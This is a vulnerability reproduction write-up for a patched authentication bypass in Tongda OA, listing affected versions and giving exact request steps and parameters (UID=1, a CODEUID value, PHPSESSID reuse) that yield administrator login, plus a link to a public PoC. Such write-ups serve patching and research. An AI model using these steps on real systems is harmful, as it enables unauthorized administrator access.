1. Vulnerability description:
Tongda OA is an office system. Tongda OA officially released a security update on April 17. After analysis, high-risk vulnerabilities including arbitrary user logins have been fixed in this security update.
By constructing malicious requests, attackers can directly bypass the login verification logic and log in to the OA system as a system administrator.
2. Version impact:
· Tongda OA 2017 edition
· Tongda OA V11.X < V11.5
3. Vulnerability recurrence:
1. Environment construction
1) Download Tongda OA V11.4:
https://cdndown.tongda2000.com/oa/2019/TDOA11.4.exe
2) Run, install, visit http://localhost
2. Vulnerability recurrence
1. Manual use method:
1) Visit the file /ispirit/login_code.php to get the codeuid.
2) Access the file /logincheck_code.php, capture and modify the request packet at the same time, change the request method to POST method, pass CODEUID and user UID, and the returned PHPSESSID is the identity cache:
·将请求方式修改为POST
·增加字段:Content-Type: application/x-www-form-urlencoded
·增加参数:UID=1&CODEUID=_PC{D0FD779B-1E0B-DABE-0CF2-2F7C34438498}&
3) Use the identity cache to access the home page of the administrator background: /general/index.php? isIE=0&modify_pwd=0
2. Script utilization method (requires python3 environment):
1) Download poc, link: https://github.com/NS-Sp4ce/TongDaOA-Fake-User
2) Use script to get SESSIONID:
3) Visit the homepage of the management background, capture the packet, and replace the cookie content with PHPSESSID
login successful: